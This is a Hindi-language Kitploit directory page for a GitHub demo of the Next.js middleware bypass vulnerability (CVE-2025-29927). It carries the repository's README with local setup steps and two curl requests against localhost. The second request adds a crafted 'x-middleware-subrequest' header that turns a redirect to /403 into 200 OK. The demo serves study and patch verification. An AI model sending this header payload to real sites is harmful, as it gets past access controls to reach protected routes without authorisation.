Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
nextjs-middleware-bypass-demo — Next.js में मिडलवेयर बाईपास भेद्यता (CVE-2025-29927) का प्रदर्शन करता है, जिसमें दिखाया गया है कि संरक्षित रूट्स तक पहुँचने के लिए x-middleware-subrequest हेडर का शोषण कैसे किया जाए। | Kitploit
उपकरण/GitHubGitHub/fourcube/nextjs-middleware-bypass-demo
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubfourcube/nextjs-middleware-bypass-demo

nextjs-middleware-bypass-demo

Next.js में मिडलवेयर बाईपास भेद्यता (CVE-2025-29927) का प्रदर्शन करता है, जिसमें दिखाया गया है कि संरक्षित रूट्स तक पहुँचने के लिए x-middleware-subrequest हेडर का शोषण कैसे किया जाए।

रिपॉजिटरी देखें
511 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927 डेमो

मूल लेख: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware

सेटअप

सबसे पहले, डेवलपमेंट सर्वर चलाएँ:

npm i
npm run dev

परिणाम देखने के लिए अपने ब्राउज़र में http://localhost:3000 खोलें।

बायपास का परीक्षण

curl -I http://localhost:3000

HTTP/1.1 307 Temporary Redirect
location: /403
Date: Mon, 24 Mar 2025 08:02:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5

curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000

HTTP/1.1 200 OK
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
link: </_next/static/media/569ce4b8f30dc480-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/media/93f479601ee12b01-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/css/app/layout.css?v=1742803407039>; rel=preload; as="style"
Cache-Control: no-store, must-revalidate
X-Powered-By: Next.js
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Mar 2025 08:03:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
टूल डाउनलोड करें